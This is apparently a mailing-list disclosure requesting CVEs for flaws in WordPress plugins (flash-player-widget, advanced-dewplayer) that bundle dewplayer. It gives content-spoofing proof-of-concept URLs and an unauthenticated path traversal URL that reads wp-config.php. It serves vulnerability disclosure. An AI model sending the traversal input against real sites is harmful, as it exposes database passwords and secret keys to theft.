While verifying (lunch break) dewplayer issues announced here http://seclists.org/fulldisclosure/2013/Dec/209 I noticed that there is same component also used with other plugins. Please notify me in case this list does not care about WordPress plugin security overall as it can make our list less readable. Only listing active (non-disabled) plugins. Q: Does content spoofing issues normally get CVE as the risk is probably minimal? Assigning one CVE for vulnerability in different software components e.g. libraries used in WordPress plugins makes it very difficult to coordinate updates with end-users. Examples: http://osvdb.org/83413 http://osvdb.org/90374 I hope to get new CVEs for these issues below. #1 Plugin: flash-player-widget Version tested: 1.3 Type: CAPEC-148: Content Spoofing PoC: http://example.com/wp-content/plugins/flash-player-widget/dewplayer.swf?mp3=http://example.mp3 SHA1: 97a4b45212be83bf8dc5dd7a289a3decac7889ab Notes: - No XSS vector by using ?xml=xss.xml - No full path disclosure #2 Plugin: advanced-dewplayer Version tested: 1.2 Type: CAPEC-148: Content Spoofing PoC: http://example.com/wp-content/plugins/advanced-dewplayer/dewplayer.swf?mp3=http://example.mp3 SHA1: 2947cc06ab1bd6e8af2229511e6797f9709ca615 (same as dewplayer-flash-mp3-player in the announcement) Notes: - No XSS vector by using ?xml=xss.xml - No full path disclosure Also at the process I noticed that there is additional security vulnerability. Details below. #3 Plugin: advanced-dewplayer Version tested: 1.2 Type: Information Disclosure / CAPEC-118: Data Leakage Attacks PoC: http://example.com/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php Impact: File wp-config.php contains database passwords, authentication keys/salts etc. Does not need authentication. General note: No time to make proper analysis so there is probably more issues :)